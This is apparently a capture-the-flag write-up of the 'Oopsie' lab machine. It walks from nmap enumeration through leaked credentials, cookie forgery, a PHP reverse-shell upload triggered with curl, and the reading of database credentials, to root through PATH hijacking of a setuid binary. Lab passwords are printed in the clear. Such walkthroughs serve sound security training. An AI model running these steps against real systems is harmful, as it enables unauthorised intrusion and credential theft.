Oopsie
Personal Rating: Easy
Enumeration
A first nmap scan reveals some open ports:
sudo nmap -sC <IP>
# 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
# 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
At the webserver the directory /cdn-cgi was listable. The directory itself could be found by fuzzing for it with ffuf. I found /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js, which contained some credentials:
admin
MEGACORP_4dm1n!!
34322 admin admin@megacorp.com
8832 john john@tafcz.co.uk
86575 super admin superadmin@megacorp.com
Web Access and Insecure Cookie Abuse
After I logged in at the webserver at http://<TARGETIP>/cdn_cgi/login with the credentials I found, there was a file upload feature that seemed to require the higher permissions of some "super admin".
Since the page was PHP-based and there was no session information in the URL, maybe there was a session cookie... I found the cookie, which was not a proper session ID, but a custom string. In the public code of /login/admin.php I found this:
if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575")
So I got privileged access to http://<TARGETIP>/cdn_cgi/login/admin.php?content=uploads&action=upload by loading that page with the cookie set to "34322".
Shell Access and Pillaging
At the upload page I could upload a PHP reverse shell and activate it with curl:
curl http://10.10.10.28/uploads/php-reverse-shell.php
The shell ran as the user www-data. Running cat /var/www/html/cdn-cgi/login/db.php yielded the following credentials:
conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
As the user robert, I could establish an SSH connection.
Insecure Relative Path
Checking the groups of the user, I saw that robert was in the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple strings bugtracker showed me this:
------------------
: EV Bug Tracker :
------------------
Provide Bug ID:
---------------
cat /root/reports/
;*3$"
I created the file /home/robert/soos/cat which is a script that starts /bin/bash. Then I exported the directory to the PATH, so that my version of cat is used when calling cat without an absolute path:
export PATH=/home/robert/soos:$PATH
Executing the bugtracker binary now, I could start a root shell.